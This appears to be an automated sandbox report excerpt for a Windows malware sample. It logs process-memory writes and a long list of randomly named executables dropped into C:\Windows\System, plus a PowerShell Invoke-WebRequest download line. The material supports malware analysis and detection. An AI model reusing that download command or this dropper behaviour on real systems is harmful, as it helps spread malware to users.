PID 2848 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pORfgZg.exe
PID 2848 wrote to memory of 4700 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pORfgZg.exe
PID 2848 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\EMTNkDj.exe
PID 2848 wrote to memory of 4520 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\EMTNkDj.exe
PID 2848 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\rfqnVcU.exe
PID 2848 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\rfqnVcU.exe
PID 2848 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\Vgtrjlz.exe
PID 2848 wrote to memory of 2080 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\Vgtrjlz.exe
PID 2848 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\lxezhLA.exe
PID 2848 wrote to memory of 3084 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\lxezhLA.exe
PID 2848 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\xuaHwvm.exe
PID 2848 wrote to memory of 4584 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\xuaHwvm.exe
PID 2848 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\cJHRFOf.exe
PID 2848 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\cJHRFOf.exe
PID 2848 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\qNCjLsp.exe
PID 2848 wrote to memory of 872 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\qNCjLsp.exe
PID 2848 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ruBTdYh.exe
PID 2848 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\ruBTdYh.exe
PID 2848 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\dhSpIZl.exe
PID 2848 wrote to memory of 5060 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\dhSpIZl.exe
PID 2848 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\gKtcUYG.exe
PID 2848 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\gKtcUYG.exe
PID 2848 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\BCtPdAN.exe
PID 2848 wrote to memory of 1712 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\BCtPdAN.exe
PID 2848 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\FKFTSzm.exe
PID 2848 wrote to memory of 928 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\FKFTSzm.exe
PID 2848 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pGoRTCY.exe
PID 2848 wrote to memory of 4384 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\pGoRTCY.exe
PID 2848 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\gOrqmJB.exe
PID 2848 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\gOrqmJB.exe
PID 2848 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\olMQlKv.exe
PID 2848 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\olMQlKv.exe
PID 2848 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DTGNfwP.exe
PID 2848 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\DTGNfwP.exe
PID 2848 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\fmAvSbw.exe
PID 2848 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\fmAvSbw.exe
PID 2848 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\AMqpqYw.exe
PID 2848 wrote to memory of 2312 N/A C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe C:\Windows\System\AMqpqYw.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\6d785b267a89b431d3e0cc7f022c97b0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\JNjawlY.exe

C:\Windows\System\JNjawlY.exe

C:\Windows\System\VzRiJoZ.exe

C:\Windows\System\VzRiJoZ.exe

C:\Windows\System\zkvquNG.exe

C:\Windows\System\zkvquNG.exe

C:\Windows\System\hkAJvxn.exe

C:\Windows\System\hkAJvxn.exe

C:\Windows\System\ohQpMmK.exe

C:\Windows\System\ohQpMmK.exe

C:\Windows\System\NTirKXC.exe

C:\Windows\System\NTirKXC.exe

C:\Windows\System\ZASDHLY.exe

C:\Windows\System\ZASDHLY.exe

C:\Windows\System\IoPasPV.exe

C:\Windows\System\IoPasPV.exe

C:\Windows\System\RfZqoFO.exe

C:\Windows\System\RfZqoFO.exe

C:\Windows\System\vXeLESQ.exe

C:\Windows\System\vXeLESQ.exe

C:\Windows\System\YhrpLxc.exe

C:\Windows\System\YhrpLxc.exe

C:\Windows\System\DQdwpES.exe

C:\Windows\System\DQdwpES.exe

C:\Windows\System\pORfgZg.exe

C:\Windows\System\pORfgZg.exe

C:\Windows\System\EMTNkDj.exe

C:\Windows\System\EMTNkDj.exe

C:\Windows\System\rfqnVcU.exe

C:\Windows\System\rfqnVcU.exe

C:\Windows\System\Vgtrjlz.exe

C:\Windows\System\Vgtrjlz.exe

C:\Windows\System\lxezhLA.exe

C:\Windows\System\lxezhLA.exe

C:\Windows\System\xuaHwvm.exe

C:\Windows\System\xuaHwvm.exe

C:\Windows\System\cJHRFOf.exe

C:\Windows\System\cJHRFOf.exe

C:\Windows\System\qNCjLsp.exe

C:\Windows\System\qNCjLsp.exe

C:\Windows\System\ruBTdYh.exe

C:\Windows\System\ruBTdYh.exe

C:\Windows\System\dhSpIZl.exe

C:\Windows\System\dhSpIZl.exe

C:\Windows\System\gKtcUYG.exe

C:\Windows\System\gKtcUYG.exe

C:\Windows\System\BCtPdAN.exe

C:\Windows\System\BCtPdAN.exe

C:\Windows\System\FKFTSzm.exe

C:\Windows\System\FKFTSzm.exe

C:\Windows\System\pGoRTCY.exe

C:\Windows\System\pGoRTCY.exe

C:\Windows\System\gOrqmJB.exe

C:\Windows\System\gOrqmJB.exe

C:\Windows\System\olMQlKv.exe

C:\Windows\System\olMQlKv.exe

C:\Windows\System\DTGNfwP.exe

C:\Windows\System\DTGNfwP.exe

C:\Windows\System\fmAvSbw.exe

C:\Windows\System\fmAvSbw.exe

C:\Windows\System\AMqpqYw.exe

C:\Windows\System\AMqpqYw.exe

C:\Windows\System\BkmpRoh.exe

C:\Windows\System\BkmpRoh.exe

C:\Windows\System\LkhSFoW.exe

C:\Windows\System\LkhSFoW.exe

C:\Windows\System\BsmHOnf.exe

C:\Windows\System\BsmHOnf.exe

C:\Windows\System\fVWTzSF.exe

C:\Windows\System\fVWTzSF.exe

C:\Windows\System\TDziNYZ.exe

C:\Windows\System\TDziNYZ.exe

C:\Windows\System\zxGFZum.exe

C:\Windows\System\zxGFZum.exe

C:\Windows\System\VFsHomq.exe

C:\Windows\System\VFsHomq.exe

C:\Windows\System\iHvrKSc.exe

C:\Windows\System\iHvrKSc.exe

C:\Windows\System\iBvLcwS.exe

C:\Windows\System\iBvLcwS.exe

C:\Windows\System\yoHotwJ.exe

C:\Windows\System\yoHotwJ.exe

C:\Windows\System\XYwUrAU.exe

C:\Windows\System\XYwUrAU.exe

C:\Windows\System\HqkwFGh.exe

C:\Windows\System\HqkwFGh.exe

C:\Windows\System\EIEcLPt.exe

C:\Windows\System\EIEcLPt.exe

C:\Windows\System\WFQCKlQ.exe

C:\Windows\System\WFQCKlQ.exe

C:\Windows\System\jUoFdnL.exe

C:\Windows\System\jUoFdnL.exe

C:\Windows\System\yiZvGln.exe

C:\Windows\System\yiZvGln.exe

C:\Windows\System\rSgLWSO.exe

C:\Windows\System\rSgLWSO.exe

C:\Windows\System\BwEicrA.exe

C:\Windows\System\BwEicrA.exe

C:\Windows\System\YMtkUqi.exe

C:\Windows\System\YMtkUqi.exe

C:\Windows\System\rgikvRZ.exe

C:\Windows\System\rgikvRZ.exe

C:\Windows\System\TZxHZJu.exe

C:\Windows\System\TZxHZJu.exe

C:\Windows\System\UjJdmiD.exe

C:\Windows\System\UjJdmiD.exe

C:\Windows\System\qXvnsNr.exe

C:\Windows\System\qXvnsNr.exe

C:\Windows\System\AYqJGee.exe

C:\Windows\System\AYqJGee.exe

C:\Windows\System\FPMsKdj.exe

C:\Windows\System\FPMsKdj.exe

C:\Windows\System\mvJYIbG.exe

C:\Windows\System\mvJYIbG.exe

C:\Windows\System\VgTDxJU.exe

C:\Windows\System\VgTDxJU.exe

C:\Windows\System\vvpaPqW.exe

C:\Windows\System\vvpaPqW.exe

C:\Windows\System\MWIrnNw.exe

C:\Windows\System\MWIrnNw.exe

C:\Windows\System\WXwkEpJ.exe

C:\Windows\System\WXwkEpJ.exe

C:\Windows\System\TRpPPXD.exe

C:\Windows\System\TRpPPXD.exe

C:\Windows\System\RnEvGFv.exe

C:\Windows\System\RnEvGFv.exe

C:\Windows\System\pEYaYrm.exe

C:\Windows\System\pEYaYrm.exe

C:\Windows\System\MtPMvqa.exe

C:\Windows\System\MtPMvqa.exe

C:\Windows\System\GcptnYn.exe

C:\Windows\System\GcptnYn.exe

C:\Windows\System\sAzpgul.exe

C:\Windows\System\sAzpgul.exe

C:\Windows\System\BkJAuGR.exe

C:\Windows\System\BkJAuGR.exe

C:\Windows\System\Itmqbou.exe

C:\Windows\System\Itmqbou.exe

C:\Windows\System\MviVvYf.exe

C:\Windows\System\MviVvYf.exe

C:\Windows\System\OGYraiS.exe

C:\Windows\System\OGYraiS.exe

C:\Windows\System\MOgevSJ.exe

C:\Windows\System\MOgevSJ.exe

C:\Windows\System\APmgImr.exe

C:\Windows\System\APmgImr.exe

C:\Windows\System\ZEBMoFd.exe

C:\Windows\System\ZEBMoFd.exe

C:\Windows\System\CPeUnwV.exe

C:\Windows\System\CPeUnwV.exe

C:\Windows\System\HxlIBjS.exe

C:\Windows\System\HxlIBjS.exe

C:\Windows\System\kilmEgV.exe

C:\Windows\System\kilmEgV.exe

C:\Windows\System\ybSWNPX.exe

C:\Windows\System\ybSWNPX.exe

C:\Windows\System\GHKZXuH.exe

C:\Windows\System\GHKZXuH.exe

C:\Windows\System\IuvwXnD.exe

C:\Windows\System\IuvwXnD.exe

C:\Windows\System\tDPvbHc.exe

C:\Windows\System\tDPvbHc.exe

C:\Windows\System\KCNAYCi.exe

C:\Windows\System\KCNAYCi.exe

C:\Windows\System\WOwtzAq.exe

C:\Windows\System\WOwtzAq.exe

C:\Windows\System\qxCaDJQ.exe

C:\Windows\System\qxCaDJQ.exe

C:\Windows\System\UXNddcq.exe

C:\Windows\System\UXNddcq.exe

C:\Windows\System\VTXwcFl.exe

C:\Windows\System\VTXwcFl.exe

C:\Windows\System\DYRPrHN.exe

C:\Windows\System\DYRPrHN.exe

C:\Windows\System\PrZKblu.exe

C:\Windows\System\PrZKblu.exe

C:\Windows\System\ahTDbwX.exe

C:\Windows\System\ahTDbwX.exe

C:\Windows\System\HvrlCqI.exe

C:\Windows\System\HvrlCqI.exe

C:\Windows\System\egKgZgh.exe

C:\Windows\System\egKgZgh.exe

C:\Windows\System\xFavAcY.exe

C:\Windows\System\xFavAcY.exe

C:\Windows\System\GKBWUeK.exe

C:\Windows\System\GKBWUeK.exe

C:\Windows\System\LJROInU.exe

C:\Windows\System\LJROInU.exe

C:\Windows\System\ADLNLFn.exe

C:\Windows\System\ADLNLFn.exe

C:\Windows\System\agqIeBi.exe

C:\Windows\System\agqIeBi.exe

C:\Windows\System\drRGUlY.exe

C:\Windows\System\drRGUlY.exe

C:\Windows\System\CqWJxHz.exe

C:\Windows\System\CqWJxHz.exe

C:\Windows\System\AxmlWMt.exe

C:\Windows\System\AxmlWMt.exe

C:\Windows\System\jdDqkxb.exe

C:\Windows\System\jdDqkxb.exe

C:\Windows\System\BWuOvOa.exe

C:\Windows\System\BWuOvOa.exe

C:\Windows\System\LPwjJXP.exe

C:\Windows\System\LPwjJXP.exe

C:\Windows\System\ZaLfKnE.exe

C:\Windows\System\ZaLfKnE.exe

C:\Windows\System\OoMRtQj.exe

C:\Windows\System\OoMRtQj.exe

C:\Windows\System\zoNRjTw.exe

C:\Windows\System\zoNRjTw.exe

C:\Windows\System\PTZdDiE.exe

C:\Windows\System\PTZdDiE.exe

C:\Windows\System\aupnwfW.exe

C:\Windows\System\aupnwfW.exe

C:\Windows\System\xGOsQLw.exe

C:\Windows\System\xGOsQLw.exe

C:\Windows\System\xBsPDdm.exe

C:\Windows\System\xBsPDdm.exe

C:\Windows\System\awAtdph.exe

C:\Windows\System\awAtdph.exe

C:\Windows\System\ktdGAif.exe

C:\Windows\System\ktdGAif.exe

C:\Windows\System\EKsMVTt.exe

C:\Windows\System\EKsMVTt.exe

C:\Windows\System\IuQyGvZ.exe

C:\Windows\System\IuQyGvZ.exe

C:\Windows\System\McFQFJg.exe

C:\Windows\System\McFQFJg.exe

C:\Windows\System\JxrKOfa.exe

C:\Windows\System\JxrKOfa.exe

C:\Windows\System\lMcndee.exe

C:\Windows\System\lMcndee.exe

C:\Windows\System\cmADpBr.exe

C:\Windows\System\cmADpBr.exe

C:\Windows\System\xAscFxU.exe

C:\Windows\System\xAscFxU.exe

C:\Windows\System\AycTeLf.exe

C:\Windows\System\AycTeLf.exe

C:\Windows\System\QIsMskm.exe

C:\Windows\System\QIsMskm.exe

C:\Windows\System\kvETmeq.exe

C:\Windows\System\kvETmeq.exe

C:\Windows\System\qrZPPsb.exe

C:\Windows\System\qrZPPsb.exe

C:\Windows\System\PbWMpQS.exe

C:\Windows\System\PbWMpQS.exe

C:\Windows\System\XjsdhhP.exe

C:\Windows\System\XjsdhhP.exe

C:\Windows\System\pWDvnoZ.exe

C:\Windows\System\pWDvnoZ.exe

C:\Windows\System\AQbpPAC.exe

C:\Windows\System\AQbpPAC.exe

C:\Windows\System\QwRkCKS.exe

C:\Windows\System\QwRkCKS.exe

C:\Windows\System\kOuZLXa.exe

C:\Windows\System\kOuZLXa.exe

C:\Windows\System\qWisbiA.exe

C:\Windows\System\qWisbiA.exe

C:\Windows\System\QNORwYk.exe

C:\Windows\System\QNORwYk.exe

C:\Windows\System\VUrVoAX.exe

C:\Windows\System\VUrVoAX.exe

C:\Windows\System\UtBVhyw.exe

C:\Windows\System\UtBVhyw.exe

C:\Windows\System\PEdDQrB.exe

C:\Windows\System\PEdDQrB.exe

C:\Windows\System\NpFJhwK.exe

C:\Windows\System\NpFJhwK.exe

C:\Windows\System\Kytrgxd.exe

C:\Windows\System\Kytrgxd.exe

C:\Windows\System\DQZzdak.exe

C:\Windows\System\DQZzdak.exe

C:\Windows\System\isBcVDF.exe

C:\Windows\System\isBcVDF.exe

C:\Windows\System\cBFxPut.exe

C:\Windows\System\cBFxPut.exe

C:\Windows\System\wRtvhcS.exe

C:\Windows\System\wRtvhcS.exe

C:\Windows\System\agVnxBM.exe

C:\Windows\System\agVnxBM.exe

C:\Windows\System\oaiGCwR.exe

C:\Windows\System\oaiGCwR.exe

C:\Windows\System\rzQxbWX.exe

C:\Windows\System\rzQxbWX.exe

C:\Windows\System\oFhCFPc.exe

C:\Windows\System\oFhCFPc.exe

C:\Windows\System\nEJKBfi.exe

C:\Windows\System\nEJKBfi.exe

C:\Windows\System\zDbNiKi.exe

C:\Windows\System\zDbNiKi.exe

C:\Windows\System\GSNyBSp.exe

C:\Windows\System\GSNyBSp.exe

C:\Windows\System\MnahLXs.exe

C:\Windows\System\MnahLXs.exe

C:\Windows\System\PKBvHGk.exe

C:\Windows\System\PKBvHGk.exe

C:\Windows\System\uEznepe.exe

C:\Windows\System\uEznepe.exe

C:\Windows\System\DvGzBwX.exe

C:\Windows\System\DvGzBwX.exe

C:\Windows\System\YbHRhGY.exe

C:\Windows\System\YbHRhGY.exe

C:\Windows\System\eYCIipj.exe

C:\Windows\System\eYCIipj.exe

C:\Windows\System\xGcSnFy.exe

C:\Windows\System\xGcSnFy.exe

C:\Windows\System\qAfizYS.exe

C:\Windows\System\qAfizYS.exe

C:\Windows\System\fxCWCAg.exe

C:\Windows\System\fxCWCAg.exe

C:\Windows\System\pLrsMWe.exe

C:\Windows\System\pLrsMWe.exe

C:\Windows\System\cJeDsiA.exe

C:\Windows\System\cJeDsiA.exe

C:\Windows\System\gwBUSvV.exe

C:\Windows\System\gwBUSvV.exe

C:\Windows\System\ijzMYtf.exe

C:\Windows\System\ijzMYtf.exe

C:\Windows\System\eobPkvC.exe

C:\Windows\System\eobPkvC.exe

C:\Windows\System\ivQjPGr.exe

C:\Windows\System\ivQjPGr.exe

C:\Windows\System\smzrHsO.exe

C:\Windows\System\smzrHsO.exe

C:\Windows\System\dxfPjDl.exe

C:\Windows\System\dxfPjDl.exe

C:\Windows\System\VZfljtm.exe

C:\Windows\System\VZfljtm.exe

C:\Windows\System\HvsoQow.exe

C:\Windows\System\HvsoQow.exe

C:\Windows\System\XYaFvvG.exe

C:\Windows\System\XYaFvvG.exe

C:\Windows\System\RupubYa.exe

C:\Windows\System\RupubYa.exe

C:\Windows\System\BtbcABY.exe

C:\Windows\System\BtbcABY.exe

C:\Windows\System\VbOAeSd.exe

C:\Windows\System\VbOAeSd.exe

C:\Windows\System\ASIrtys.exe

C:\Windows\System\ASIrtys.exe

C:\Windows\System\WNnLJGd.exe

C:\Windows\System\WNnLJGd.exe

C:\Windows\System\tyTeezp.exe

C:\Windows\System\tyTeezp.exe

C:\Windows\System\hwulKpw.exe

C:\Windows\System\hwulKpw.exe

C:\Windows\System\olsThSw.exe

C:\Windows\System\olsThSw.exe

C:\Windows\System\NZblWAo.exe

C:\Windows\System\NZblWAo.exe

C:\Windows\System\MpdqGSo.exe

C:\Windows\System\MpdqGSo.exe

C:\Windows\System\JdcmBKE.exe

C:\Windows\System\JdcmBKE.exe

C:\Windows\System\tMVcAus.exe

C:\Windows\System\tMVcAus.exe

C:\Windows\System\LBKISQV.exe

C:\Windows\System\LBKISQV.exe

C:\Windows\System\uITtFPq.exe

C:\Windows\System\uITtFPq.exe

C:\Windows\System\URcNmNq.exe

C:\Windows\System\URcNmNq.exe

C:\Windows\System\mSrAdQK.exe

C:\Windows\System\mSrAdQK.exe

C:\Windows\System\GWkJDMc.exe

C:\Windows\System\GWkJDMc.exe

C:\Windows\System\XBmxoMR.exe

C:\Windows\System\XBmxoMR.exe

C:\Windows\System\MtPhRoD.exe

C:\Windows\System\MtPhRoD.exe

C:\Windows\System\jyHwfJV.exe

C:\Windows\System\jyHwfJV.exe

C:\Windows\System\nWVfonB.exe

C:\Windows\System\nWVfonB.exe

C:\Windows\System\ACrBnBo.exe

C:\Windows\System\ACrBnBo.exe

C:\Windows\System\oUkzbkB.exe

C:\Windows\System\oUkzbkB.exe

C:\Windows\System\XNBiHuh.exe

C:\Windows\System\XNBiHuh.exe

C:\Windows\System\dPQEXuK.exe

C:\Windows\System\dPQEXuK.exe

C:\Windows\System\mPhNssq.exe

C:\Windows\System\mPhNssq.exe

C:\Windows\System\tuNfWzY.exe

C:\Windows\System\tuNfWzY.exe

C:\Windows\System\emvlmXw.exe

C:\Windows\System\emvlmXw.exe

C:\Windows\System\GzpqTQs.exe

C:\Windows\System\GzpqTQs.exe

C:\Windows\System\Zgodoan.exe

C:\Windows\System\Zgodoan.exe

C:\Windows\System\zTZxbEL.exe

C:\Windows\System\zTZxbEL.exe

C:\Windows\System\tYrhXUR.exe

C:\Windows\System\tYrhXUR.exe

C:\Windows\System\TDxdPYZ.exe

C:\Windows\System\TDxdPYZ.exe

C:\Windows\System\zigoBsi.exe

C:\Windows\System\zigoBsi.exe

C:\Windows\System\NIASmXA.exe

C:\Windows\System\NIASmXA.exe

C:\Windows\System\zaarstc.exe

C:\Windows\System\zaarstc.exe

C:\Windows\System\pKabRmt.exe

C:\Windows\System\pKabRmt.exe

C:\Windows\System\GUUkhST.exe

C:\Windows\System\GUUkhST.exe

C:\Windows\System\cBkKOWI.exe

C:\Windows\System\cBkKOWI.exe

C:\Windows\System\NZhrCNR.exe

C:\Windows\System\NZhrCNR.exe

C:\Windows\System\UhXiecd.exe

C:\Windows\System\UhXiecd.exe

C:\Windows\System\tldlZxE.exe

C:\Windows\System\tldlZxE.exe

C:\Windows\System\sJaSYGF.exe

C:\Windows\System\sJaSYGF.exe

C:\Windows\System\bOexNrD.exe

C:\Windows\System\bOexNrD.exe

C:\Windows\System\qMBGUMZ.exe

C:\Windows\System\qMBGUMZ.exe

C:\Windows\System\axDDvHB.exe

C:\Windows\System\axDDvHB.exe

C:\Windows\System\UdVqOkh.exe

C:\Windows\System\UdVqOkh.exe

C:\Windows\System\vtFwWfF.exe

C:\Windows\System\vtFwWfF.exe

C:\Windows\System\kURyAFQ.exe

C:\Windows\System\kURyAFQ.exe

C:\Windows\System\lUQgzuf.exe

C:\Windows\System\lUQgzuf.exe

C:\Windows\System\SBFvgpR.exe

C:\Windows\System\SBFvgpR.exe

C:\Windows\System\JFZzvjQ.exe

C:\Windows\System\JFZzvjQ.exe

C:\Windows\System\tmjuQeC.exe

C:\Windows\System\tmjuQeC.exe

C:\Windows\System\brYQgvh.exe

C:\Windows\System\brYQgvh.exe

C:\Windows\System\fvvGKrp.exe

C:\Windows\System\fvvGKrp.exe

C:\Windows\System\IKEUsKD.exe

C:\Windows\System\IKEUsKD.exe

C:\Windows\System\HNWpdxz.exe

C:\Windows\System\HNWpdxz.exe

C:\Windows\System\rzdmsDZ.exe

C:\Windows\System\rzdmsDZ.exe

C:\Windows\System\kOiUfeb.exe

C:\Windows\System\kOiUfeb.exe

C:\Windows\System\VXShCfE.exe

C:\Windows\System\VXShCfE.exe

C:\Windows\System\yAGGvbk.exe

C:\Windows\System\yAGGvbk.exe

C:\Windows\System\BLKmHJT.exe

C:\Windows\System\BLKmHJT.exe

C:\Windows\System\BkHOuAa.exe

C:\Windows\System\BkHOuAa.exe

C:\Windows\System\aGsJZby.exe

C:\Windows\System\aGsJZby.exe

C:\Windows\System\IlbDYFN.exe

C:\Windows\System\IlbDYFN.exe

C:\Windows\System\lXqPNvk.exe

C:\Windows\System\lXqPNvk.exe

C:\Windows\System\mfSetQL.exe

C:\Windows\System\mfSetQL.exe

C:\Windows\System\hRQetEe.exe

C:\Windows\System\hRQetEe.exe

C:\Windows\System\CoCslbM.exe

C:\Windows\System\CoCslbM.exe

C:\Windows\System\mbzWgyu.exe

C:\Windows\System\mbzWgyu.exe

C:\Windows\System\kEAPrAV.exe

C:\Windows\System\kEAPrAV.exe

C:\Windows\System\HAjsBXF.exe

C:\Windows\System\HAjsBXF.exe

C:\Windows\System\ozFCTYu.exe

C:\Windows\System\ozFCTYu.exe

C:\Windows\System\pEvZhzi.exe

C:\Windows\System\pEvZhzi.exe

C:\Windows\System\kVnYXJT.exe

C:\Windows\System\kVnYXJT.exe

C:\Windows\System\tvbRJBA.exe

C:\Windows\System\tvbRJBA.exe

C:\Windows\System\lqJvhqc.exe

C:\Windows\System\lqJvhqc.exe

C:\Windows\System\YmkOmsM.exe

C:\Windows\System\YmkOmsM.exe

C:\Windows\System\ofRhIbF.exe

C:\Windows\System\ofRhIbF.exe

C:\Windows\System\xLNmezp.exe

C:\Windows\System\xLNmezp.exe

C:\Windows\System\GcQxUMT.exe

C:\Windows\System\GcQxUMT.exe

C:\Windows\System\SZYvDWK.exe

C:\Windows\System\SZYvDWK.exe

C:\Windows\System\OVNNkrB.exe

C:\Windows\System\OVNNkrB.exe

C:\Windows\System\kpHuKHP.exe

C:\Windows\System\kpHuKHP.exe

C:\Windows\System\npEqWkq.exe

C:\Windows\System\npEqWkq.exe

C:\Windows\System\vmJAdIh.exe

C:\Windows\System\vmJAdIh.exe

C:\Windows\System\OzSkmSD.exe

C:\Windows\System\OzSkmSD.exe

C:\Windows\System\ErNufDS.exe

C:\Windows\System\ErNufDS.exe

C:\Windows\System\ognrMiz.exe

C:\Windows\System\ognrMiz.exe

C:\Windows\System\FoedAPM.exe

C:\Windows\System\FoedAPM.exe

C:\Windows\System\DnCRePl.exe

C:\Windows\System\DnCRePl.exe

C:\Windows\System\jaOeffQ.exe

C:\Windows\System\jaOeffQ.exe

C:\Windows\System\LeEcrJs.exe

C:\Windows\System\LeEcrJs.exe

C:\Windows\System\AAzQrNN.exe

C:\Windows\System\AAzQrNN.exe

C:\Windows\System\XZGXMms.exe

C:\Windows\System\XZGXMms.exe

C:\Windows\System\PlIGZER.exe

C:\Windows\System\PlIGZER.exe

C:\Windows\System\bicxpvy.exe

C:\Windows\System\bicxpvy.exe

C:\Windows\System\ALgOLPM.exe

C:\Windows\System\ALgOLPM.exe

C:\Windows\System\nlaYqvY.exe

C:\Windows\System\nlaYqvY.exe

C:\Windows\System\CrguPqy.exe

C:\Windows\System\CrguPqy.exe

C:\Windows\System\zPIccFc.exe

C:\Windows\System\zPIccFc.exe

C:\Windows\System\NeGsZvP.exe

C:\Windows\System\NeGsZvP.exe

C:\Windows\System\jQbyxBX.exe

C:\Windows\System\jQbyxBX.exe

C:\Windows\System\WFtPskY.exe

C:\Windows\System\WFtPskY.exe

C:\Windows\System\FOVAUFc.exe

C:\Windows\System\FOVAUFc.exe

C:\Windows\System\gaZoPAW.exe

C:\Windows\System\gaZoPAW.exe

C:\Windows\System\eVRVrEZ.exe

C:\Windows\System\eVRVrEZ.exe

C:\Windows\System\stcAbzo.exe

C:\Windows\System\stcAbzo.exe

C:\Windows\System\IcWYgft.exe

C:\Windows\System\IcWYgft.exe

C:\Windows\System\QacFgID.exe

C:\Windows\System\QacFgID.exe

C:\Windows\System\ixBpMNn.exe

C:\Windows\System\ixBpMNn.exe

C:\Windows\System\FkrjbKN.exe

C:\Windows\System\FkrjbKN.exe

C:\Windows\System\VvLpXXa.exe

C:\Windows\System\VvLpXXa.exe

C:\Windows\System\cUzAThC.exe

C:\Windows\System\cUzAThC.exe

C:\Windows\System\NtwnFBS.exe

C:\Windows\System\NtwnFBS.exe

C:\Windows\System\EZDJYoJ.exe

C:\Windows\System\EZDJYoJ.exe

C:\Windows\System\PjJxlKg.exe

C:\Windows\System\PjJxlKg.exe

C:\Windows\System\jMYKssJ.exe

